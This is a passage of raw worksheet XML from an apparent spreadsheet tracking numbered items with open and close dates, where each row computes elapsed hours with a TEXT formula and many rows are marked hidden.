      </c>
      <c r="C281" t="s">
        <v>1476</v>
      </c>
      <c r="D281" t="s">
        <v>7</v>
      </c>
      <c r="E281" s="1">
        <v>43670.99181712963</v>
      </c>
      <c r="F281" s="1">
        <v>43672.007905092592</v>
      </c>
      <c r="G281" t="s">
        <v>1477</v>
      </c>
      <c r="H281" t="str">
        <f>TEXT(F281-E281,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="282" spans="1:8" hidden="1">
      <c r="A282" t="s">
        <v>1478</v>
      </c>
      <c r="B282">
        <v>14109</v>
      </c>
      <c r="C282" t="s">
        <v>1479</v>
      </c>
      <c r="D282" t="s">
        <v>7</v>
      </c>
      <c r="E282" s="1">
        <v>43670.983877314815</v>
      </c>
      <c r="F282" s="1">
        <v>43671.979733796295</v>
      </c>
      <c r="G282" t="s">
        <v>109</v>
      </c>
      <c r="H282" t="str">
        <f>TEXT(F282-E282,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="283" spans="1:8">
      <c r="A283" t="s">
        <v>1480</v>
      </c>
      <c r="B283">
        <v>14108</v>
      </c>
      <c r="C283" t="s">
        <v>1481</v>
      </c>
      <c r="D283" t="s">
        <v>7</v>
      </c>
      <c r="E283" s="1">
        <v>43670.961111111108</v>
      </c>
      <c r="F283" s="1">
        <v>43671.701504629629</v>
      </c>
      <c r="G283" t="s">
        <v>16</v>
      </c>
      <c r="H283" t="str">
        <f>TEXT(F283-E283,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="284" spans="1:8" hidden="1">
      <c r="A284" t="s">
        <v>773</v>
      </c>
      <c r="B284">
        <v>14106</v>
      </c>
      <c r="C284" t="s">
        <v>1482</v>
      </c>
      <c r="D284" t="s">
        <v>7</v>
      </c>
      <c r="E284" s="1">
        <v>43670.915196759262</v>
      </c>
      <c r="F284" s="1">
        <v>43670.955694444441</v>
      </c>
      <c r="G284" t="s">
        <v>163</v>
      </c>
      <c r="H284" t="str">
        <f>TEXT(F284-E284,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="285" spans="1:8" hidden="1">
      <c r="A285" t="s">
        <v>1483</v>
      </c>
      <c r="B285">
        <v>14101</v>
      </c>
      <c r="C285" t="s">
        <v>1484</v>
      </c>
      <c r="D285" t="s">
        <v>7</v>
      </c>
      <c r="E285" s="1">
        <v>43670.448981481481</v>
      </c>
      <c r="F285" s="1">
        <v>43692.600104166668</v>
      </c>
      <c r="G285" t="s">
        <v>43</v>
      </c>
      <c r="H285" t="str">
        <f>TEXT(F285-E285,"[h]")</f>
        <v>531</v>
      </c>
    </row>
    <row r="286" spans="1:8" hidden="1">
      <c r="A286" t="s">
        <v>1485</v>
      </c>
      <c r="B286">
        <v>14100</v>
      </c>
      <c r="C286" t="s">
        <v>1486</v>
      </c>
      <c r="D286" t="s">
        <v>7</v>
      </c>
      <c r="E286" s="1">
        <v>43670.428032407406</v>
      </c>
      <c r="F286" s="1">
        <v>43685.500462962962</v>
      </c>
      <c r="G286" t="s">
        <v>1487</v>
      </c>
      <c r="H286" t="str">
        <f>TEXT(F286-E286,"[h]")</f>
        <v>361</v>
      </c>
    </row>
    <row r="287" spans="1:8" hidden="1">
      <c r="A287" t="s">
        <v>1488</v>
      </c>
      <c r="B287">
        <v>14099</v>
      </c>
      <c r="C287" t="s">
        <v>1489</v>
      </c>
      <c r="D287" t="s">
        <v>7</v>
      </c>
      <c r="E287" s="1">
        <v>43670.390590277777</v>
      </c>
      <c r="F287" s="1">
        <v>43672.007905092592</v>
      </c>
      <c r="G287" t="s">
        <v>115</v>
      </c>
      <c r="H287" t="str">
        <f>TEXT(F287-E287,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="288" spans="1:8" hidden="1">
      <c r="A288" t="s">
        <v>1490</v>
      </c>
      <c r="B288">
        <v>14098</v>
      </c>
      <c r="C288" t="s">
        <v>1491</v>
      </c>
      <c r="D288" t="s">
        <v>7</v>
      </c>
      <c r="E288" s="1">
        <v>43670.180439814816</v>
      </c>
      <c r="F288" s="1">
        <v>43702.666828703703</v>
      </c>
      <c r="G288" t="s">
        <v>1492</v>
      </c>
      <c r="H288" t="str">
        <f>TEXT(F288-E288,"[h]")</f>
        <v>779</v>
      </c>
    </row>
    <row r="289" spans="1:8" hidden="1">
      <c r="A289" t="s">
        <v>1493</v>
      </c>
      <c r="B289">
        <v>14097</v>
      </c>
      <c r="C289" t="s">
        <v>1494</v>
      </c>
      <c r="D289" t="s">
        <v>7</v>
      </c>
      <c r="E289" s="1">
        <v>43670.149062500001</v>
      </c>
      <c r="F289" s="1">
        <v>43699.551504629628</v>
      </c>
      <c r="G289" t="s">
        <v>174</v>
      </c>
      <c r="H289" t="str">
        <f>TEXT(F289-E289,"[h]")</f>
        <v>705</v>
      </c>
    </row>
    <row r="290" spans="1:8" hidden="1">
      <c r="A290" t="s">
        <v>1495</v>
      </c>
      <c r="B290">
        <v>14094</v>
      </c>
      <c r="C290" t="s">
        <v>1496</v>
      </c>
      <c r="D290" t="s">
        <v>7</v>
      </c>
      <c r="E290" s="1">
        <v>43670.102743055555</v>
      </c>
      <c r="F290" s="1">
        <v>43671.776805555557</v>
      </c>
      <c r="G290" t="s">
        <v>769</v>
      </c>
      <c r="H290" t="str">
        <f>TEXT(F290-E290,"[h]")</f>
        <v>40</v>
      </c>
    </row>
    <row r="291" spans="1:8" hidden="1">
      <c r="A291" t="s">
        <v>1497</v>
      </c>
      <c r="B291">
        <v>14092</v>
      </c>
      <c r="C291" t="s">
        <v>1498</v>
      </c>
      <c r="D291" t="s">
        <v>7</v>
      </c>
      <c r="E291" s="1">
        <v>43669.991157407407</v>
      </c>
      <c r="F291" s="1">
        <v>43670.0159375</v>
      </c>
      <c r="G291" t="s">
        <v>998</v>
      </c>
      <c r="H291" t="str">
        <f>TEXT(F291-E291,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:8" hidden="1">
      <c r="A292" t="s">
        <v>1449</v>
      </c>
      <c r="B292">
        <v>14091</v>
      </c>
      <c r="C292" t="s">
        <v>1450</v>
      </c>
      <c r="D292" t="s">
        <v>7</v>
      </c>
      <c r="E292" s="1">
        <v>43669.899375000001</v>
      </c>
      <c r="F292" s="1">
        <v>43670.923645833333</v>
      </c>
      <c r="G292" t="s">
        <v>103</v>
      </c>
      <c r="H292" t="str">
        <f>TEXT(F292-E292,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="293" spans="1:8" hidden="1">
      <c r="A293" t="s">
        <v>1499</v>
      </c>
      <c r="B293">
        <v>14089</v>
      </c>
      <c r="C293" t="s">
        <v>1500</v>
      </c>
      <c r="D293" t="s">
        <v>7</v>
      </c>
      <c r="E293" s="1">
        <v>43669.803865740738</v>
      </c>
      <c r="F293" s="1">
        <v>43672.107256944444</v>
      </c>
      <c r="G293" t="s">
        <v>51</v>
      </c>
      <c r="H293" t="str">
        <f>TEXT(F293-E293,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="294" spans="1:8">
      <c r="A294" t="s">
        <v>1501</v>
      </c>
      <c r="B294">
        <v>14087</v>
      </c>
      <c r="C294" t="s">
        <v>1502</v>
      </c>
      <c r="D294" t="s">
        <v>7</v>
      </c>
      <c r="E294" s="1">
        <v>43669.617060185185</v>
      </c>
      <c r="F294" s="1">
        <v>43670.923634259256</v>
      </c>
      <c r="G294" t="s">
        <v>1456</v>
      </c>
      <c r="H294" t="str">
        <f>TEXT(F294-E294,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="295" spans="1:8" hidden="1">
      <c r="A295" t="s">
        <v>1503</v>
      </c>
      <c r="B295">
        <v>14086</v>
      </c>
      <c r="C295" t="s">
        <v>1504</v>
      </c>
      <c r="D295" t="s">
        <v>7</v>
      </c>
      <c r="E295" s="1">
        <v>43669.579814814817</v>
      </c>
      <c r="F295" s="1">
        <v>43696.155810185184</v>
      </c>
      <c r="G295" t="s">
        <v>1505</v>
      </c>
      <c r="H295" t="str">
        <f>TEXT(F295-E295,"[h]")</f>
        <v>637</v>
      </c>
    </row>
    <row r="296" spans="1:8" hidden="1">
      <c r="A296" t="s">
        <v>1451</v>
      </c>
      <c r="B296">
        <v>14085</v>
      </c>
      <c r="C296" t="s">
        <v>1452</v>
      </c>
      <c r="D296" t="s">
        <v>7</v>
      </c>
      <c r="E296" s="1">
        <v>43669.470532407409</v>
      </c>
      <c r="F296" s="1">
        <v>43669.632175925923</v>
      </c>
      <c r="G296" t="s">
        <v>1453</v>
      </c>
      <c r="H296" t="str">
        <f>TEXT(F296-E296,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="297" spans="1:8" hidden="1">
      <c r="A297" t="s">
        <v>1508</v>
      </c>
      <c r="B297">
        <v>14083</v>
      </c>
      <c r="C297" t="s">
        <v>1509</v>
      </c>
      <c r="D297" t="s">
        <v>7</v>
      </c>
      <c r="E297" s="1">
        <v>43669.094687500001</v>
      </c>
      <c r="F297" s="1">
        <v>43729.733449074076</v>
      </c>
      <c r="G297" t="s">
        <v>1510</v>
      </c>
      <c r="H297" t="str">
        <f>TEXT(F297-E297,"[h]")</f>
        <v>1455</v>
      </c>
    </row>
    <row r="298" spans="1:8">
      <c r="A298" t="s">
        <v>1506</v>
      </c>
      <c r="B298">
        <v>14080</v>
      </c>
      <c r="C298" t="s">
        <v>777</v>
      </c>
      <c r="D298" t="s">
        <v>7</v>
      </c>
      <c r="E298" s="1">
        <v>43669.039421296293</v>
      </c>
      <c r="F298" s="1">
        <v>43669.096597222226</v>
      </c>
      <c r="G298" t="s">
        <v>1507</v>
      </c>
      <c r="H298" t="str">
        <f>TEXT(F298-E298,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="299" spans="1:8">
      <c r="A299" t="s">
        <v>1515</v>
      </c>
      <c r="B299">
        <v>14077</v>
      </c>
      <c r="C299" t="s">
        <v>1516</v>
      </c>
      <c r="D299" t="s">
        <v>7</v>
      </c>
      <c r="E299" s="1">
        <v>43668.041342592594</v>
      </c>
      <c r="F299" s="1">
        <v>43674.947164351855</v>
      </c>
      <c r="G299" t="s">
        <v>1517</v>
      </c>
      <c r="H299" t="str">
        <f>TEXT(F299-E299,"[h]")</f>
        <v>165</v>
      </c>
    </row>
    <row r="300" spans="1:8" hidden="1">
      <c r="A300" t="s">
        <v>1399</v>
      </c>
      <c r="B300">
        <v>14076</v>
      </c>
      <c r="C300" t="s">
        <v>1400</v>
      </c>
      <c r="D300" t="s">
        <v>7</v>
      </c>
      <c r="E300" s="1">
        <v>43667.918252314812</v>
      </c>
      <c r="F300" s="1">
        <v>43676.840057870373</v>
      </c>
      <c r="G300" t="s">
        <v>1143</v>
      </c>
      <c r="H300" t="str">
        <f>TEXT(F300-E300,"[h]")</f>
        <v>214</v>
      </c>
    </row>
    <row r="301" spans="1:8">
      <c r="A301" t="s">
        <v>1513</v>
      </c>
      <c r="B301">
        <v>14074</v>
      </c>
      <c r="C301" t="s">
        <v>1514</v>
      </c>
      <c r="D301" t="s">
        <v>7</v>
      </c>
      <c r="E301" s="1">
        <v>43667.603298611109</v>
      </c>
      <c r="F301" s="1">
        <v>43668.857835648145</v>
      </c>
      <c r="G301" t="s">
        <v>16</v>
      </c>
      <c r="H301" t="str">
        <f>TEXT(F301-E301,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="302" spans="1:8" hidden="1">
      <c r="A302" t="s">
        <v>1518</v>
      </c>
      <c r="B302">
        <v>14073</v>
      </c>
      <c r="C302" t="s">
        <v>1519</v>
      </c>
      <c r="D302" t="s">
        <v>7</v>
      </c>
      <c r="E302" s="1">
        <v>43667.520231481481</v>
      </c>
      <c r="F302" s="1">
        <v>43686.053252314814</v>
      </c>
      <c r="G302" t="s">
        <v>1520</v>
      </c>
      <c r="H302" t="str">
        <f>TEXT(F302-E302,"[h]")</f>
        <v>444</v>
      </c>
    </row>
    <row r="303" spans="1:8" hidden="1">
      <c r="A303" t="s">
        <v>1521</v>
      </c>
      <c r="B303">
        <v>14072</v>
      </c>
      <c r="C303" t="s">
        <v>1522</v>
      </c>
      <c r="D303" t="s">
        <v>7</v>
      </c>
      <c r="E303" s="1">
        <v>43667.371249999997</v>
      </c>
      <c r="F303" s="1">
        <v>43669.749328703707</v>
      </c>
      <c r="G303" t="s">
        <v>201</v>
      </c>
      <c r="H303" t="str">
        <f>TEXT(F303-E303,"[h]")</f>
        <v>57</v>
      </c>
    </row>
    <row r="304" spans="1:8" hidden="1">
      <c r="A304" t="s">
        <v>1523</v>
      </c>
      <c r="B304">
        <v>14070</v>
      </c>
      <c r="C304" t="s">
        <v>1524</v>
      </c>
      <c r="D304" t="s">
        <v>7</v>
      </c>
      <c r="E304" s="1">
        <v>43666.931550925925</v>
      </c>
      <c r="F304" s="1">
        <v>43693.257974537039</v>
      </c>
      <c r="G304" t="s">
        <v>75</v>
      </c>
      <c r="H304" t="str">
        <f>TEXT(F304-E304,"[h]")</f>
        <v>631</v>
      </c>
    </row>
    <row r="305" spans="1:8" hidden="1">
      <c r="A305" t="s">
        <v>1527</v>
      </c>
      <c r="B305">
        <v>14068</v>
      </c>
      <c r="C305" t="s">
        <v>1528</v>
      </c>
      <c r="D305" t="s">
        <v>7</v>
      </c>
      <c r="E305" s="1">
        <v>43666.789236111108</v>
      </c>
      <c r="F305" s="1">
        <v>43669.114189814813</v>
      </c>
      <c r="G305" t="s">
        <v>919</v>
      </c>
      <c r="H305" t="str">
        <f>TEXT(F305-E305,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="306" spans="1:8" hidden="1">
      <c r="A306" t="s">
        <v>1529</v>
      </c>
      <c r="B306">
        <v>14064</v>
      </c>
      <c r="C306" t="s">
        <v>1530</v>
      </c>
      <c r="D306" t="s">
        <v>7</v>
      </c>
      <c r="E306" s="1">
        <v>43665.684699074074</v>
      </c>
      <c r="F306" s="1">
        <v>43669.751539351855</v>
      </c>
      <c r="G306" t="s">
        <v>51</v>
      </c>
      <c r="H306" t="str">
        <f>TEXT(F306-E306,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="307" spans="1:8">
      <c r="A307" t="s">
        <v>1511</v>
      </c>
      <c r="B307">
        <v>14063</v>
      </c>
      <c r="C307" t="s">
        <v>1512</v>
      </c>
      <c r="D307" t="s">
        <v>7</v>
      </c>
      <c r="E307" s="1">
        <v>43665.65996527778</v>
      </c>
      <c r="F307" s="1">
        <v>43669.044016203705</v>
      </c>
      <c r="G307" t="s">
        <v>22</v>
      </c>
      <c r="H307" t="str">
        <f>TEXT(F307-E307,"[h]")</f>
        <v>81</v>
      </c>
    </row>
    <row r="308" spans="1:8" hidden="1">
      <c r="A308" t="s">
        <v>1531</v>
      </c>
      <c r="B308">
        <v>14062</v>
      </c>
      <c r="C308" t="s">
        <v>1532</v>
      </c>
      <c r="D308" t="s">
        <v>7</v>
      </c>
      <c r="E308" s="1">
        <v>43665.546018518522</v>
      </c>
      <c r="F308" s="1">
        <v>43672.931608796294</v>
      </c>
      <c r="G308" t="s">
        <v>1520</v>
      </c>
      <c r="H308" t="str">
        <f>TEXT(F308-E308,"[h]")</f>
        <v>177</v>
      </c>
    </row>
    <row r="309" spans="1:8" hidden="1">
      <c r="A309" t="s">
        <v>1533</v>
      </c>
      <c r="B309">
        <v>14061</v>
      </c>
      <c r="C309" t="s">
        <v>1534</v>
      </c>
      <c r="D309" t="s">
        <v>7</v>
      </c>
      <c r="E309" s="1">
        <v>43665.514016203706</v>
      </c>
      <c r="F309" s="1">
        <v>43665.837500000001</v>
      </c>
      <c r="G309" t="s">
        <v>1535</v>
      </c>
      <c r="H309" t="str">
        <f>TEXT(F309-E309,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="310" spans="1:8" hidden="1">
      <c r="A310" t="s">
        <v>1536</v>
      </c>
      <c r="B310">
        <v>14060</v>
      </c>
      <c r="C310" t="s">
        <v>1537</v>
      </c>
      <c r="D310" t="s">
        <v>7</v>
      </c>
      <c r="E310" s="1">
        <v>43664.97078703704</v>
      </c>
      <c r="F310" s="1">
        <v>43669.63689814815</v>
      </c>
      <c r="G310" t="s">
        <v>255</v>
      </c>
      <c r="H310" t="str">
        <f>TEXT(F310-E310,"[h]")</f>
        <v>111</v>
      </c>
    </row>
    <row r="311" spans="1:8">
      <c r="A311" t="s">
        <v>1540</v>
      </c>
      <c r="B311">
        <v>14057</v>
      </c>
      <c r="C311" t="s">
        <v>1541</v>
      </c>
      <c r="D311" t="s">
        <v>7</v>
      </c>
      <c r="E311" s="1">
        <v>43664.861122685186</v>
      </c>
      <c r="F311" s="1">
        <v>43665.063240740739</v>
      </c>
      <c r="G311" t="s">
        <v>98</v>
      </c>
      <c r="H311" t="str">
        <f>TEXT(F311-E311,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="312" spans="1:8">
      <c r="A312" t="s">
        <v>1542</v>
      </c>
      <c r="B312">
        <v>14056</v>
      </c>
      <c r="C312" t="s">
        <v>1543</v>
      </c>
      <c r="D312" t="s">
        <v>7</v>
      </c>
      <c r="E312" s="1">
        <v>43664.857916666668</v>
      </c>
      <c r="F312" s="1">
        <v>43665.062777777777</v>
      </c>
      <c r="G312" t="s">
        <v>1544</v>
      </c>
      <c r="H312" t="str">
        <f>TEXT(F312-E312,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="313" spans="1:8" hidden="1">
      <c r="A313" t="s">
        <v>1545</v>
      </c>
      <c r="B313">
        <v>14053</v>
      </c>
      <c r="C313" t="s">
        <v>1546</v>
      </c>
      <c r="D313" t="s">
        <v>7</v>
      </c>
      <c r="E313" s="1">
        <v>43664.03943287037</v>
      </c>
      <c r="F313" s="1">
        <v>43669.705752314818</v>
      </c>
      <c r="G313" t="s">
        <v>461</v>
      </c>
      <c r="H313" t="str">
        <f>TEXT(F313-E313,"[h]")</f>
        <v>135</v>
      </c>
    </row>
    <row r="314" spans="1:8">
      <c r="A314" t="s">
        <v>1547</v>
      </c>
      <c r="B314">
        <v>14052</v>
      </c>
      <c r="C314" t="s">
        <v>1548</v>
      </c>
      <c r="D314" t="s">
        <v>7</v>
      </c>
      <c r="E314" s="1">
        <v>43663.919178240743</v>
      </c>
      <c r="F314" s="1">
        <v>43664.015081018515</v>
      </c>
      <c r="G314" t="s">
        <v>31</v>
      </c>
      <c r="H314" t="str">
        <f>TEXT(F314-E314,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="315" spans="1:8">
      <c r="A315" t="s">
        <v>1549</v>
      </c>
      <c r="B315">
        <v>14049</v>
      </c>
      <c r="C315" t="s">
        <v>1550</v>
      </c>
      <c r="D315" t="s">
        <v>7</v>
      </c>
      <c r="E315" s="1">
        <v>43663.897175925929</v>
      </c>
      <c r="F315" s="1">
        <v>43670.927337962959</v>
      </c>
      <c r="G315" t="s">
        <v>123</v>
      </c>
      <c r="H315" t="str">
        <f>TEXT(F315-E315,"[h]")</f>
        <v>168</v>
      </c>
    </row>
    <row r="316" spans="1:8">
      <c r="A316" t="s">
        <v>1454</v>
      </c>
      <c r="B316">
        <v>14048</v>
      </c>
      <c r="C316" t="s">
        <v>1455</v>
      </c>
      <c r="D316" t="s">
        <v>7</v>
      </c>
      <c r="E316" s="1">
        <v>43663.89702546296</v>
      </c>
      <c r="F316" s="1">
        <v>43670.863726851851</v>
      </c>
      <c r="G316" t="s">
        <v>1456</v>
      </c>
      <c r="H316" t="str">
        <f>TEXT(F316-E316,"[h]")</f>
        <v>167</v>
      </c>
    </row>
    <row r="317" spans="1:8" hidden="1">
      <c r="A317" t="s">
        <v>1551</v>
      </c>
      <c r="B317">
        <v>14047</v>
      </c>
      <c r="C317" t="s">
        <v>1552</v>
      </c>
      <c r="D317" t="s">
        <v>7</v>
      </c>
      <c r="E317" s="1">
        <v>43663.854791666665</v>
      </c>
      <c r="F317" s="1">
        <v>43664.120347222219</v>
      </c>
      <c r="G317" t="s">
        <v>118</v>
      </c>
      <c r="H317" t="str">
        <f>TEXT(F317-E317,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="318" spans="1:8">
      <c r="A318" t="s">
        <v>1553</v>
      </c>
      <c r="B318">
        <v>14046</v>
      </c>
      <c r="C318" t="s">
        <v>1554</v>
      </c>
      <c r="D318" t="s">
        <v>7</v>
      </c>
      <c r="E318" s="1">
        <v>43663.72115740741</v>
      </c>
      <c r="F318" s="1">
        <v>43664.852546296293</v>
      </c>
      <c r="G318" t="s">
        <v>1555</v>
      </c>
      <c r="H318" t="str">
        <f>TEXT(F318-E318,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="319" spans="1:8">
      <c r="A319" t="s">
        <v>1556</v>
      </c>
      <c r="B319">
        <v>14045</v>
      </c>
      <c r="C319" t="s">
        <v>1557</v>
      </c>
      <c r="D319" t="s">
        <v>7</v>
      </c>
      <c r="E319" s="1">
        <v>43663.717372685183</v>
      </c>
      <c r="F319" s="1">
        <v>43663.860972222225</v>
      </c>
      <c r="G319" t="s">
        <v>683</v>
      </c>
      <c r="H319" t="str">
        <f>TEXT(F319-E319,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="320" spans="1:8">
      <c r="A320" t="s">
        <v>1558</v>
      </c>
      <c r="B320">
        <v>14044</v>
      </c>
      <c r="C320" t="s">
        <v>1559</v>
      </c>
      <c r="D320" t="s">
        <v>7</v>
      </c>
      <c r="E320" s="1">
        <v>43663.707395833335</v>
      </c>
      <c r="F320" s="1">
        <v>43663.8674537037</v>
      </c>
      <c r="G320" t="s">
        <v>1403</v>
      </c>
      <c r="H320" t="str">
        <f>TEXT(F320-E320,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="321" spans="1:8">
      <c r="A321" t="s">
        <v>1560</v>
      </c>
      <c r="B321">
        <v>14043</v>
      </c>
      <c r="C321" t="s">
        <v>1561</v>
      </c>
      <c r="D321" t="s">
        <v>7</v>
      </c>
      <c r="E321" s="1">
        <v>43663.698923611111</v>
      </c>
      <c r="F321" s="1">
        <v>43663.866840277777</v>
      </c>
      <c r="G321" t="s">
        <v>98</v>
      </c>
      <c r="H321" t="str">
        <f>TEXT(F321-E321,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="322" spans="1:8">
      <c r="A322" t="s">
        <v>1562</v>
      </c>
      <c r="B322">
        <v>14042</v>
      </c>
      <c r="C322" t="s">
        <v>1563</v>
      </c>
      <c r="D322" t="s">
        <v>7</v>
      </c>
      <c r="E322" s="1">
        <v>43663.68849537037</v>
      </c>
      <c r="F322" s="1">
        <v>43663.736030092594</v>
      </c>
      <c r="G322" t="s">
        <v>98</v>
      </c>
      <c r="H322" t="str">
        <f>TEXT(F322-E322,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="323" spans="1:8">
      <c r="A323" t="s">
        <v>1564</v>
      </c>
      <c r="B323">
        <v>14041</v>
      </c>
      <c r="C323" t="s">
        <v>1565</v>
      </c>
      <c r="D323" t="s">
        <v>7</v>
      </c>
      <c r="E323" s="1">
        <v>43663.683842592596</v>
      </c>
      <c r="F323" s="1">
        <v>43663.8671875</v>
      </c>
      <c r="G323" t="s">
        <v>1566</v>
      </c>
      <c r="H323" t="str">
        <f>TEXT(F323-E323,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="324" spans="1:8" hidden="1">
      <c r="A324" t="s">
        <v>1567</v>
      </c>
      <c r="B324">
        <v>14040</v>
      </c>
      <c r="C324" t="s">
        <v>1568</v>
      </c>
      <c r="D324" t="s">
        <v>7</v>
      </c>
      <c r="E324" s="1">
        <v>43663.673715277779</v>
      </c>
      <c r="F324" s="1">
        <v>43663.721967592595</v>
      </c>
      <c r="G324" t="s">
        <v>1569</v>
      </c>
      <c r="H324" t="str">
        <f>TEXT(F324-E324,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="325" spans="1:8" hidden="1">
      <c r="A325" t="s">
        <v>1570</v>
      </c>
      <c r="B325">
        <v>14039</v>
      </c>
      <c r="C325" t="s">
        <v>1571</v>
      </c>
      <c r="D325" t="s">
        <v>7</v>
      </c>
      <c r="E325" s="1">
        <v>43663.587557870371</v>
      </c>
      <c r="F325" s="1">
        <v>43677.738749999997</v>
      </c>
      <c r="G325" t="s">
        <v>1572</v>
      </c>
      <c r="H325" t="str">
        <f>TEXT(F325-E325,"[h]")</f>
        <v>339</v>
      </c>
    </row>
    <row r="326" spans="1:8" hidden="1">
      <c r="A326" t="s">
        <v>1525</v>
      </c>
      <c r="B326">
        <v>14037</v>
      </c>
      <c r="C326" t="s">
        <v>1526</v>
      </c>
      <c r="D326" t="s">
        <v>7</v>
      </c>
      <c r="E326" s="1">
        <v>43663.543090277781</v>
      </c>
      <c r="F326" s="1">
        <v>43685.538182870368</v>
      </c>
      <c r="G326" t="s">
        <v>115</v>
      </c>
      <c r="H326" t="str">
        <f>TEXT(F326-E326,"[h]")</f>
        <v>527</v>
      </c>
    </row>
    <row r="327" spans="1:8" hidden="1">
      <c r="A327" t="s">
        <v>1287</v>
      </c>
      <c r="B327">
        <v>14036</v>
      </c>
      <c r="C327" t="s">
        <v>1573</v>
      </c>
      <c r="D327" t="s">
        <v>7</v>
      </c>
      <c r="E327" s="1">
        <v>43663.398194444446</v>
      </c>
      <c r="F327" s="1">
        <v>43668.247650462959</v>
      </c>
      <c r="G327" t="s">
        <v>1487</v>
      </c>
      <c r="H327" t="str">
        <f>TEXT(F327-E327,"[h]")</f>
        <v>116</v>
      </c>
    </row>
    <row r="328" spans="1:8" hidden="1">
      <c r="A328" t="s">
        <v>1574</v>
      </c>
      <c r="B328">
        <v>14035</v>
      </c>
      <c r="C328" t="s">
        <v>1575</v>
      </c>
      <c r="D328" t="s">
        <v>7</v>
      </c>
      <c r="E328" s="1">
        <v>43663.366944444446</v>
      </c>
      <c r="F328" s="1">
        <v>43756.542627314811</v>
      </c>
      <c r="G328" t="s">
        <v>368</v>
      </c>
      <c r="H328" t="str">
        <f>TEXT(F328-E328,"[h]")</f>
        <v>2236</v>
      </c>
    </row>
    <row r="329" spans="1:8" hidden="1">
      <c r="A329" t="s">
        <v>1576</v>
      </c>
      <c r="B329">
        <v>14032</v>
      </c>
      <c r="C329" t="s">
        <v>1577</v>
      </c>
      <c r="D329" t="s">
        <v>7</v>
      </c>
      <c r="E329" s="1">
        <v>43663.155578703707</v>
      </c>
      <c r="F329" s="1">
        <v>43683.203842592593</v>
      </c>
      <c r="G329" t="s">
        <v>831</v>
      </c>
      <c r="H329" t="str">
        <f>TEXT(F329-E329,"[h]")</f>
        <v>481</v>
      </c>
    </row>
    <row r="330" spans="1:8" hidden="1">
      <c r="A330" t="s">
        <v>1580</v>
      </c>
      <c r="B330">
        <v>14028</v>
      </c>
      <c r="C330" t="s">
        <v>1581</v>
      </c>
      <c r="D330" t="s">
        <v>7</v>
      </c>
      <c r="E330" s="1">
        <v>43662.918587962966</v>
      </c>
      <c r="F330" s="1">
        <v>43663.650763888887</v>
      </c>
      <c r="G330" t="s">
        <v>445</v>
      </c>
      <c r="H330" t="str">
        <f>TEXT(F330-E330,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="331" spans="1:8" hidden="1">
      <c r="A331" t="s">
        <v>1582</v>
      </c>
      <c r="B331">
        <v>14027</v>
      </c>
      <c r="C331" t="s">
        <v>1583</v>
      </c>
      <c r="D331" t="s">
        <v>7</v>
      </c>
      <c r="E331" s="1">
        <v>43662.889652777776</v>
      </c>
      <c r="F331" s="1">
        <v>43685.671203703707</v>
      </c>
      <c r="G331" t="s">
        <v>1584</v>
      </c>
      <c r="H331" t="str">
        <f>TEXT(F331-E331,"[h]")</f>
        <v>546</v>
      </c>
    </row>
    <row r="332" spans="1:8" hidden="1">
      <c r="A332" t="s">
        <v>1585</v>
      </c>
      <c r="B332">
        <v>14026</v>
      </c>
      <c r="C332" t="s">
        <v>1586</v>
      </c>
      <c r="D332" t="s">
        <v>7</v>
      </c>
      <c r="E332" s="1">
        <v>43662.743622685186</v>
      </c>
      <c r="F332" s="1">
        <v>43669.872071759259</v>
      </c>
      <c r="G332" t="s">
        <v>1587</v>
      </c>
      <c r="H332" t="str">
        <f>TEXT(F332-E332,"[h]")</f>
        <v>171</v>
      </c>
    </row>
    <row r="333" spans="1:8" hidden="1">
      <c r="A333" t="s">
        <v>1588</v>
      </c>
      <c r="B333">
        <v>14025</v>
      </c>
      <c r="C333" t="s">
        <v>1589</v>
      </c>
      <c r="D333" t="s">
        <v>7</v>
      </c>
      <c r="E333" s="1">
        <v>43662.664120370369</v>
      </c>
      <c r="F333" s="1">
        <v>43663.568425925929</v>
      </c>
      <c r="G333" t="s">
        <v>445</v>
      </c>
      <c r="H333" t="str">
        <f>TEXT(F333-E333,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="334" spans="1:8" hidden="1">
      <c r="A334" t="s">
        <v>1590</v>
      </c>
      <c r="B334">
        <v>14024</v>
      </c>
      <c r="C334" t="s">
        <v>1591</v>
      </c>
      <c r="D334" t="s">
        <v>7</v>
      </c>
      <c r="E334" s="1">
        <v>43662.642685185187</v>
      </c>
      <c r="F334" s="1">
        <v>43664.121168981481</v>
      </c>
      <c r="G334" t="s">
        <v>118</v>
      </c>
      <c r="H334" t="str">
        <f>TEXT(F334-E334,"[h]")</f>
        <v>35</v>
      </c>
    </row>
    <row r="335" spans="1:8" hidden="1">
      <c r="A335" t="s">
        <v>1592</v>
      </c>
      <c r="B335">
        <v>14022</v>
      </c>
      <c r="C335" t="s">
        <v>1593</v>
      </c>
      <c r="D335" t="s">
        <v>7</v>
      </c>
      <c r="E335" s="1">
        <v>43662.011678240742</v>
      </c>
      <c r="F335" s="1">
        <v>43662.261736111112</v>
